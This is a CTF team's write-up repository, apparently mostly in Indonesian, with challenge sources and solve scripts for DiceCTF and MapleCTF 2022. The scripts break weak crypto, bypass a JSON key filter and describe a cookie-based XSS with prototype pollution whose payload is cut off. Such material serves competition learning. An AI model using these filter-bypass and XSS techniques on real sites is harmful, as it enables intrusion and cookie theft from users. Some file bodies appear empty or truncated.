--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211919.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222211921.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211921.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222211953.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211953.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212013.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212013.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212045.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212045.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212131.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212131.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212154.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212154.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212232.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212232.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212243.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212243.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212315.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212315.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222214414.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222214414.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222214636.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222214636.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222215806.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222215806.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Quals/TCP1P_CJ2022.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Quals/TCP1P_CJ2022.pdf
--------------------------------------------------------------------------------
/2022/Compfest14-quals/COMPFEST14_TCP1P.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/Compfest14-quals/COMPFEST14_TCP1P.pdf
--------------------------------------------------------------------------------
/2022/Cyberwariors-Hackathon-Quals/CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/Cyberwariors-Hackathon-Quals/CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf
--------------------------------------------------------------------------------
/2022/Cyberwariors-Hackathon-Quals/READMME.md:
--------------------------------------------------------------------------------
1 | .pdf)
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/kfb/flag.txt:
--------------------------------------------------------------------------------
1 | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}_
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/kfb/server.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python -u
2 |
3 | from Crypto.Cipher import AES
4 | from Crypto.Random import get_random_bytes
5 | from Crypto.Util.Padding import pad
6 | from Crypto.Util.strxor import strxor
7 | from more_itertools import ichunked
8 |
9 | BLOCK = AES.block_size
10 | FLAG = open('flag.txt', 'rb').read().strip()
11 |
12 | def encrypt_block(k, pt):
13 | cipher = AES.new(k, AES.MODE_ECB)
14 | return cipher.encrypt(pt)
15 |
16 | def encrypt(k, pt):
17 | assert len(k) == BLOCK
18 | pt = pad(pt, BLOCK)
19 | ct = b''
20 | for bk in ichunked(pt, BLOCK):
21 | ct += strxor(encrypt_block(k, k), bytes(bk))
22 | return ct
23 |
24 | def main():
25 | k = get_random_bytes(BLOCK)
26 | enc = encrypt(k, FLAG)
27 | print(f'> {enc.hex()}')
28 |
29 | pt = bytes.fromhex(input('< '))[:BLOCK]
30 | enc = encrypt(k, pt)
31 | print(f'> {enc.hex()}')
32 |
33 | if __name__ == '__main__':
34 | main()
35 |
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/kfb/solve.py:
--------------------------------------------------------------------------------
1 |
2 | input_plain = 'A' * 16
3 | input_enc = "76bc16a9f5b95995e83aa5d4472d4e41"
4 |
5 | flag_enc = "0ec376dc9ec22fe7a759ddab22513a0e15d86fda8ef63deaa759c1b1315b013903f36dd78ade3ada9a1986f16f593c6603943e8a80cd7cb1852db2c3503a5956"
6 |
7 | def brute_key(plain, enc):
8 | '''brute force the key. enc is hex, plain is ascii'''
9 | enc = bytes.fromhex(enc)
10 | key = ""
11 | for i, v in enumerate(enc):
12 | for j in range(256):
13 | if chr(v ^ j) == plain[i]:
14 | key += j.to_bytes(1, "big").hex()
15 | break
16 | return key
17 |
18 | def xor_enc(enc, key):
19 | '''xor the enc with the key. enc is hex, key is hex'''
20 | key = bytes.fromhex(key)
21 | enc = bytes.fromhex(enc)
22 | flag = ""
23 | for i, v in enumerate(enc):
24 | s = v ^ key[i % len(key)]
25 | flag += chr(s)
26 | return flag.encode("ascii").hex()
27 |
28 | def get_patern():
29 | '''make dictionary of patern, and return dictionary of key and value,
30 | where the key is the hex patern and the value is the ascii patern'''
31 | patern_hex = "3033323534373639383b3a3d3c3f3e212023222524272629282b1013121514171619181b1a1d1c1f1e010003020504070609080b606362656467666968612a2c0e"
32 | patern_hex = [patern_hex[i:i+2] for i in range(0, len(patern_hex), 2)]
33 | alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}_"
34 | lst = dict()
35 | for i, v in enumerate(alphabet):
36 | lst[patern_hex[i]] = v
37 | return lst
38 |
39 | def translate_patern(enc):
40 | '''translate the hex patern to ascii, where enc is hex'''
41 | enc = [enc[i:i+2] for i in range(0, len(enc), 2)]
42 | patern = get_patern()
43 | text = ""
44 | try:
45 | for i in enc:
46 | text += patern[i]
47 | except:
48 | return text
49 | return text
50 |
51 | key = brute_key(input_plain, input_enc)
52 | ugly_flag = xor_enc(flag_enc, key)
53 |
54 | flag = (translate_patern(ugly_flag))
55 |
56 | print(flag)
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/obp/obp.output.txt:
--------------------------------------------------------------------------------
1 | babda2b7a9bcbda68db38dbebda68dbdb48db9b7aba18dbfb6a2aaa7a3beb1a2bfb7b5a3a7afd8
2 |
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/obp/solve.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | with open('obp.output.txt', 'r') as f:
4 | plaintext = bytearray.fromhex(f.read())
5 |
6 | # print(plaintext)
7 |
8 | for i in range(256):
9 | random.seed(i)
10 | key = random.randrange(256)
11 | ciphertext = [key ^ byte for byte in plaintext]
12 |
13 | print(bytes(ciphertext))
14 |
15 | # hope{not_a_lot_of_keys_mdpxuqlcpmegqu}
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/encrypted.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/crypto/pem/encrypted.bin
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/flag.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/crypto/pem/flag.txt
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/generate.py:
--------------------------------------------------------------------------------
1 | from Crypto.PublicKey import RSA
2 | from Crypto.Cipher import PKCS1_OAEP
3 |
4 | with open('flag.txt','rb') as f:
5 | flag = f.read()
6 |
7 | key = RSA.generate(2048)
8 | cipher_rsa = PKCS1_OAEP.new(key)
9 | enc = cipher_rsa.encrypt(flag)
10 |
11 | with open('privatekey.pem','wb') as f:
12 | f.write(key.export_key('PEM'))
13 |
14 | with open("encrypted.bin", "wb") as f:
15 | f.write(enc)
16 |
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/privatekey.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEogIBAAKCAQEAxAYlKx//McvCLMmkxnIyJCHSTC2oGlm2N6SGol6s8mKQp3+g
3 | NoZHZnimFASKqyHoBJbfsB9Tzl50tOy3hyBKrjzKZFFrSXShFDRDP9Q11CeUpAbx
4 | L5hCzOo8IYSMHfifstJilxIc2kJkLz7zPC+IjbpQE1ec0TOnSnIqyaKLUKbimOkw
5 | MTcxqFppadUjqw1Fg3wqxxl/mTYt296DpMmGRZ45G3JXb2CTkArWi9PKNvvWHH+d
6 | kxUgG681gwAOSRYH4QiCKMYHH2RdYtRPI0eyGXlLxEfNbncGrFjcnBf7eDMULAuM
7 | GWSPhFVJtXaRGhDydZC8cMU815TgeLIJwpib7wIDAQABAoIBABSSJoVjirbRkLN9
8 | h7axljR3fiezZOA7COXG9MAGWnTnRhHl0UzXg5er0pXoMhsqaDxPDvNfHj7aZ7ny
9 | 24GpMF0fkQe9CZrATAUgROxmWy3D55PdDKN3gY8ah6vmyoN8q1mrPWBoLLH05KmW
10 | nBT1Ugm5gxy8hX7owkYMPBRD5AXXBnKJndpnoIIYAQDMNOlxcQdQT4C2Zpw6ti+y
11 | EsLLEwIMJCGSOerfldEtsUnjE6RhfN73iOXBPKTr1yNXooGwgaCFFwyMB5HzDUnG
12 | m9/q0dKNBSkWaEAqqtwww3krHP/1RJtF0OlUwTJIo02fqny84R2wGZy5tVYX83hH
13 | Z98SFdkCgYEA0Zcr+s0r3zq7gtWNScj1XpeHg6BRvGE93pdTUqRvG85NIz9zpXpp
14 | WZXCuvuU6XxZT7739cqqDh7YKAh31nyeSDdzKKpGjZV4/ux88Muzds33eDjQBRBI
15 | EtHiuse6zYuQnxykjCQfPuG2v/DPFbMKQ18Oa+OuGRn7PK1DP4V0y1kCgYEA723x
16 | h4DpSPJgHuxhGVevjIQ9gT06sdSqhF6b0CJJtdG08pUz0AK4Lrn/W1xE2dzuTRmG
17 | /Y1XMnCo0ddDOyfBmwjBC+9t2GunF+5xz0s2vNEMxXOy17z5cZjtElQqU6WkBKoQ
18 | 6kn3ElKiM4zlRI7lj6HTd8WZ8DaGw/cZi0vAYIcCgYA14kizTSZXWNE2fNK7Qoga
19 | zphPddsttE5kuMD6QT4zhuF8C2cfBw6osoEC84VAVfDcOLulHHqF8NYfzLWKljVX
20 | WbIopUZIRkJ6P7CLc8Nq6t8RsIGCm8H73KwO2ySijZwb3BBN20eRMhR62l1TNdmQ
21 | opKhmEJ9P5nA6sacQSJa2QKBgDMT1Evg/2N1eXX/XXOHlka2y1wv0L6xLLNSb5EG
22 | T40/MIfztnrwqZQmT8iQtYt4q0m9YWPj7C8xg4JIluoewBmv02cVa+yYgqwDTTo4
23 | xHOhcUUKOqP1h41pX2HinKj9lDD+it9Aajn5cOroatymU2jB0BgkCoQJTdSueT+T
24 | KHYvAoGAJPG2L0XNDtXW0MzZv16tiu5K5E3gEcvBYOcrnyq0Hc4EQVy2OF4825N5
25 | 6kOTaX5VjrIkBfBXxOdOiFJLCbHaQhtHtR2UY1u2H6EEOommNS6UaDrurZ03EqEW
26 | Vfd+xSRR6zSHN6NQwXT/9vIKbFzr7aqGElrAOWLoLUQ2NsKp3eI=
27 | -----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/solve.py:
--------------------------------------------------------------------------------
1 | from Crypto.PublicKey import RSA
2 | from Crypto.Cipher import PKCS1_OAEP
3 |
4 | private_key = RSA.import_key(open('privatekey.pem').read())
5 | cipher_rsa = PKCS1_OAEP.new(private_key)
6 | with open('encrypted.bin', 'rb') as f:
7 | enc = f.read()
8 | flag = cipher_rsa.decrypt(enc)
9 | print(flag)
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/check/.gdb_history:
--------------------------------------------------------------------------------
1 | disass main
2 | exit
3 | disass main
4 | disass -function
5 | disass *-fflush
6 | disass *strcmp
7 | disass 0x1886
8 | disass *0x1886
9 | exit
10 | b *0x192d
11 | run
12 | n
13 | n
14 | run
15 | clear
16 | clear *0x192d
17 | b *0x192a
18 | run
19 | n
20 | run
21 | c *0x192a
22 | clear *0x192a
23 | run
24 | disass strcpm
25 | disass *strcmp
26 | b *strcmp
27 | run
28 | n
29 | exit
30 | python
31 | import gdb
32 |
33 | gdb.execute("b *strcmp")
34 | for i in range(10):
35 | gdb.execute("n")
36 | end
37 | python
38 | import gdb
39 |
40 | gdb.execute("b *strcmp")
41 | gdb.execute("run")
42 | for i in range(10):
43 | gdb.execute("n")
44 | end
45 | n
46 | c
47 | python
48 | import gdb
49 |
50 | gdb.execute("b *strcmp")
51 | gdb.execute("run")
52 | for i in range(40):
53 | gdb.execute("n")
54 | end
55 | exit
56 |
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/check/challenge:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/rev/check/challenge
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/check/solve.py:
--------------------------------------------------------------------------------
1 | import gdb
2 |
3 | gdb.execute("b *strcmp")
4 | gdb.execute("run")
5 | for i in range(40):
6 | gdb.execute("n")
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/slices/solve.py:
--------------------------------------------------------------------------------
1 |
2 | flag = ["a" for i in range(32)]
3 |
4 | flag[:5] = 'hope{'
5 | flag[-1] = '}'
6 | flag[5::3] = 'i0_tnl3a0'
7 | flag[4::4] = '{0p0lsl'
8 | flag[3::5] = 'e0y_3l'
9 | flag[6::3] = '_vph_is_t'
10 | flag[7::3] = 'ley0sc_l}'
11 |
12 | print('flag is: ', "".join(flag))
13 |
--------------------------------------------------------------------------------
/2022/DiceCTF/web/inspect-me/README.md:
--------------------------------------------------------------------------------
1 | Untuk challenge kali ini, saya hanya perlu mendownload ekstensi absolute clicker di chrome. Kemudian mendownload source code challenge ini.
--------------------------------------------------------------------------------
/2022/DiceCTF/web/inspect-me/inspect-me.mc.ax.html:
--------------------------------------------------------------------------------
1 |
2 |
34 |
46 |
47 |
125 |
129 |
130 |
--------------------------------------------------------------------------------
/2022/DiceCTF/web/pastebin/README.md:
--------------------------------------------------------------------------------
1 | Setelah bebrapa kali mencoba, kita menemukan hahwa `>` di black list
2 |
3 | ```
4 | 
Note: kode programnya saya rubah sedikit, untuk keperluan debuging\n",
49 | "\n",
50 | "Bisa dilihat bahwa `if statement` ini menggunakan fungsi `strings.Contains`, dimana fungsi ini Case Sensitive, kita bisa mebypassnya menggunakan huruf besar, contoh:\n",
51 | "\n",
52 | "```python\n",
53 | "bypass1 = \"What_point\"\n",
54 | "```\n",
55 | "\n",
56 | "Yang kedua:\n",
57 | "```go\n",
58 | "..snip...\n",
59 | "\t\t\tvar whatpoint importantStuff\n",
60 | "\t\t\terr = json.Unmarshal(body, &whatpoint)\n",
61 | "\t\t\tif err != nil {\n",
62 | "\t\t\t\tfmt.Fprintf(w, \"error 2 not json format\")\n",
63 | "\t\t\t\treturn\n",
64 | "\t\t\t}\n",
65 | "...snip...\n",
66 | "```\n",
67 | "Kita lihat di fungsi `json.Unmarshal` yang akan error, jika request body yang kita kirimkan tidak berbentuk json.\n",
68 | "\n",
69 | "Setelah diatasnya ada variable yang menggunakan custom type struct:\n",
70 | "\n",
71 | "```go\n",
72 | "...snip...\n",
73 | "type importantStuff struct {\n",
74 | "\tWhatpoint string `json:\"what_point\"`\n",
75 | "}\n",
76 | "...snip...\n",
77 | "```\n",
78 | "\n",
79 | "Dimana struct ini berisi variable `Whatpoint` yang didalamnya berisi field tag `json:\"what_point\"`. Yess, mungkin ini yang kita cari untuk membypasss `if statement` selanjutnya.\n",
80 | "\n",
81 | "Yang ketiga:\n",
82 | "\n",
83 | "```go\n",
84 | "...snip...\n",
85 | "\t\t\tif whatpoint.Whatpoint == \"that_point\" {\n",
86 | "\t\t\t\tfmt.Fprintf(w, \"Congrats! Here is the flag: %s\", flag)\n",
87 | "\t\t\t\treturn\n",
88 | "\t\t\t} else {\n",
89 | "\t\t\t\tfmt.Fprintf(w, string(body))\n",
90 | "\t\t\t\tfmt.Fprintf(w, \"bypass 2 error\")\n",
91 | "\t\t\t\treturn\n",
92 | "\t\t\t}\n",
93 | "...snip...\n",
94 | "```\n",
95 | "\n",
96 | "Jadi karna disini kita sudah tau bahwa variable `whatpoint` memiliki field tag `json:\"what_point\"`, disini kita hanya perlu memberikan http request body yang berisikan format json seperti ini:\n",
97 | "\n",
98 | "```json\n",
99 | "{\n",
100 | "\t\"what_point\":\"that_point\"\n",
101 | "}\n",
102 | "```\n",
103 | "karna perlu bypass untuk `if statement` pertama tadi, kita ubah json-nya menjadi:\n",
104 | "```json\n",
105 | "\n",
106 | "{\n",
107 | "\t\"What_point\":\"that_point\"\n",
108 | "}\n",
109 | "```\n",
110 | "\n",
111 | "Matap, kita mendapatkan flagnya: `Congrats! Here is the flag: hope{cA5e_anD_P0iNt_Ar3_1mp0rT4nT}`"
112 | ]
113 | }
114 | ],
115 | "metadata": {
116 | "kernelspec": {
117 | "display_name": "Python 3.10.4 64-bit",
118 | "language": "python",
119 | "name": "python3"
120 | },
121 | "language_info": {
122 | "codemirror_mode": {
123 | "name": "ipython",
124 | "version": 3
125 | },
126 | "file_extension": ".py",
127 | "mimetype": "text/x-python",
128 | "name": "python",
129 | "nbconvert_exporter": "python",
130 | "pygments_lexer": "ipython3",
131 | "version": "3.10.4"
132 | },
133 | "orig_nbformat": 4,
134 | "vscode": {
135 | "interpreter": {
136 | "hash": "e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a"
137 | }
138 | }
139 | },
140 | "nbformat": 4,
141 | "nbformat_minor": 2
142 | }
143 |
--------------------------------------------------------------------------------
/2022/DiceCTF/web/point/point.main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "encoding/json"
5 | "fmt"
6 | "io"
7 | "log"
8 | "net/http"
9 | "os"
10 | "strings"
11 | )
12 |
13 | type importantStuff struct {
14 | Whatpoint string `json:"what_point"`
15 | }
16 |
17 | func main() {
18 | flag, err := os.ReadFile("flag.txt")
19 | if err != nil {
20 | panic(err)
21 | }
22 |
23 | http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
24 | switch r.Method {
25 | case http.MethodGet:
26 | fmt.Fprint(w, "Hello, world")
27 | return
28 | case http.MethodPost:
29 | body, err := io.ReadAll(r.Body)
30 | if err != nil {
31 | fmt.Fprintf(w, "error 1")
32 | return
33 | }
34 |
35 | if strings.Contains(string(body), "what_point") || strings.Contains(string(body), "\\") {
36 | fmt.Fprintf(w, string(body))
37 | fmt.Fprintf(w, "bypass 1")
38 | return
39 | }
40 |
41 | var whatpoint importantStuff
42 | err = json.Unmarshal(body, &whatpoint)
43 | if err != nil {
44 | fmt.Fprintf(w, "error 2 not json format")
45 | return
46 | }
47 |
48 | // fmt.Fprintf(w, string(body))
49 | fmt.Fprintln(w, whatpoint.Whatpoint)
50 |
51 | if whatpoint.Whatpoint == "that_point" {
52 | fmt.Fprintf(w, "Congrats! Here is the flag: %s", flag)
53 | return
54 | } else {
55 | fmt.Fprintf(w, string(body))
56 | fmt.Fprintf(w, "bypass 2 error")
57 | return
58 | }
59 | default:
60 | fmt.Fprint(w, "Method not allowed")
61 | return
62 | }
63 | })
64 |
65 | log.Fatal(http.ListenAndServe(":8081", nil))
66 |
67 | }
68 |
--------------------------------------------------------------------------------
/2022/DiceCTF/web/point/solve.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | URL = "https://point.mc.ax/"
4 | # URL = "http://localhost:8081"
5 |
6 | bypass1 = "What_point"
7 | bypass2 = "that_point"
8 | bypassjson = {bypass1: bypass2}
9 | req = requests.post(url=URL, json=bypassjson)
10 | print(req.text)
--------------------------------------------------------------------------------
/2022/DiceCTF/web/reverser/reverser.app.py:
--------------------------------------------------------------------------------
1 | from flask import Flask, render_template_string, request
2 |
3 | app = Flask(__name__)
4 |
5 |
6 | @app.get('/')
7 | def index():
8 | result = '''
9 |
10 |
11 |
Text Reverser
12 | Reverse any text... now as a web service!
13 |
17 |
18 | '''
19 | return render_template_string(result)
20 |
21 |
22 | @app.post('/')
23 | def reverse():
24 | result = '''
25 |
26 |
27 |
Text Reverser
28 | Reverse any text... now as a web service!
29 |
33 |
Output: %s
34 |
${goosemsg}
`}
44 | 
45 | ${goosecount === '' ? '': ` You have honked ${goosecount} times today
`}
46 |
47 |
53 |
54 | `;
55 |
56 |
57 | app.get('/', (req, res) => {
58 | if (req.cookies.honk){
59 | //construct object
60 | let finalhonk = {};
61 | if (typeof(req.cookies.honk) === 'object'){
62 | finalhonk = req.cookies.honk
63 | } else {
64 | finalhonk = {
65 | message: clean(req.cookies.honk),
66 | amountoftimeshonked: req.cookies.honkcount.toString()
67 | };
68 | }
69 | res.send(template(finalhonk.message, finalhonk.amountoftimeshonked));
70 | } else {
71 | const initialhonk = 'HONK';
72 | res.cookie('honk', initialhonk, {
73 | httpOnly: true
74 | });
75 | res.cookie('honkcount', 0, {
76 | httpOnly: true
77 | });
78 | res.redirect('/');
79 | }
80 | });
81 |
82 | app.get('/changehonk', (req, res) => {
83 | res.cookie('honk', req.query.newhonk, {
84 | httpOnly: true
85 | });
86 | res.cookie('honkcount', 0, {
87 | httpOnly: true
88 | });
89 | res.redirect('/');
90 | });
91 |
92 | app.post('/report', (req, res) => {
93 | const url = req.body.url;
94 | goose.visit(url);
95 | res.send('honk');
96 | });
97 |
98 | app.listen(PORT, () => console.log((new Date())+`: Web/honksay server listening on port ${PORT}`));
99 |
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | export name="honksay"
3 | export port="9988"
4 | docker rm -f $name
5 | docker build --tag=$name .
6 | docker run -p $port:$port --rm --name=$name $name
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/goose.js:
--------------------------------------------------------------------------------
1 | const puppeteer = require('puppeteer');
2 | const FLAG = process.env.FLAG || "maple{fake}";
3 |
4 | async function visit(url) {
5 | let browser, page;
6 | return new Promise(async (resolve, reject) => {
7 | try {
8 | browser = await puppeteer.launch({
9 | headless: true,
10 | args: [
11 | '--no-sandbox',
12 | '--disable-default-apps',
13 | '--disable-dev-shm-usage',
14 | '--disable-extensions',
15 | '--disable-gpu',
16 | '--disable-sync',
17 | '--disable-translate',
18 | '--hide-scrollbars',
19 | '--metrics-recording-only',
20 | '--mute-audio',
21 | '--no-first-run',
22 | '--safebrowsing-disable-auto-update'
23 | ]
24 | });
25 | page = await browser.newPage();
26 | await page.setCookie({
27 | name: 'flag',
28 | value: FLAG,
29 | domain: 'localhost',
30 | samesite: 'none'
31 | });
32 | await page.goto(url, {waitUntil : 'networkidle2' }).catch(e => console.log(e));
33 | console.log(page.cookies());
34 | await new Promise(resolve => setTimeout(resolve, 500));
35 | console.log("admin is visiting url:");
36 | console.log(url);
37 | await page.close();
38 |
39 | console.log("admin visited url");
40 | page = null;
41 | } catch (err){
42 | console.log(err);
43 | } finally {
44 | if (page) await page.close();
45 | console.log("page closed");
46 | if (browser) await browser.close();
47 | console.log("browser closed");
48 | //no rejectz
49 | resolve();
50 | console.log("resolved");
51 | }
52 | });
53 | };
54 |
55 |
56 | module.exports = { visit }
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "honksay",
3 | "author": "vie",
4 | "version": "0.0.0",
5 | "private": true,
6 | "scripts": {
7 | "start": "echo ERR"
8 | },
9 | "dependencies": {
10 | "cookie-parser": "^1.4.6",
11 | "express": "^4.18.1",
12 | "puppeteer": "^16.2.0",
13 | "xss": "^1.0.14"
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/public/._images:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/public/._images
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/public/images/._goosevie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/public/images/._goosevie.png
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/public/images/goosevie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/public/images/goosevie.png
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/solve.md:
--------------------------------------------------------------------------------
1 | # honksay
2 | XSS + JS prototype polution
3 | Pertama pelu kita ketahui, bahwa bot menyimpan flag.
4 | bisa kita lihat di goose.js
5 |
6 | ```js
7 | ...snip...
8 | const FLAG = process.env.FLAG || "maple{fake}";
9 | ...snip...
10 | await page.setCookie({
11 | name: 'flag',
12 | value: FLAG,
13 | domain: 'localhost',
14 | samesite: 'none'
15 | });
16 | ```
17 |
18 | Ada sesuatu yang menarik mata app.js, dimana jika typeof dari honk merupakan objek maka tidak akan di parse oleh funcsi clean (fungsi yang ngeparse xss, xss module).
19 |
20 | ```js
21 | ...snip...
22 | if (typeof (req.cookies.honk) === 'object') {
23 | finalhonk = req.cookies.honk
24 | } else {
25 | finalhonk = {
26 | message: clean(req.cookies.honk),
27 | amountoftimeshonked: req.cookies.honkcount.toString()
28 | };
29 | }
30 | ...snip...
31 | ```
32 |
33 | Bisa kita lihat lagi di app.js-nya, disitu ada get request yang mengarah ke /changehonk . Yes, disini merupakan entrance, dari xss nya. Tapi wait, dia hanya bisa mengubah cookie honk saja, benarkah???
34 |
35 | ```js
36 | ...snip...
37 | app.get('/changehonk', (req, res) => {
38 | res.cookie('honk', req.query.newhonk, {
39 | httpOnly: true
40 | });
41 | res.cookie('honkcount', 0, {
42 | httpOnly: true
43 | });
44 | res.redirect('/');
45 | });
46 | ...snip...
47 | ```
48 |
49 | Disini JS prototype polution mengambil peran, dimana kita bisa mengubahnya menjadi objek dengan menginputkan get request ke /changehonk, dan mengambil alih output yang akan di keluarkan message dan amountoftimeshonked.
50 |
51 | ```js
52 | ...snip...
53 | app.get('/', (req, res) => {
54 | if (req.cookies.honk) {
55 | //construct object
56 | let finalhonk = {};
57 | fs.appendFileSync("./log.txt", "\ntypeof: " + typeof (req.cookies.honk + "\n")) // debug
58 | if (typeof (req.cookies.honk) === 'object') {
59 | finalhonk = req.cookies.honk
60 | } else {
61 | finalhonk = {
62 | message: clean(req.cookies.honk),
63 | amountoftimeshonked: req.cookies.honkcount.toString()
64 | };
65 | }
66 | res.send(template(finalhonk.message, finalhonk.amountoftimeshonked));
67 | }
68 | ...snip...
69 | ```
70 |
71 | ```
72 | Payload
73 | get request to:
74 | http://localhost:9988/changehonk
75 | parameter 1:
76 | newhonk[message]=asdasd
77 | parameter 2:
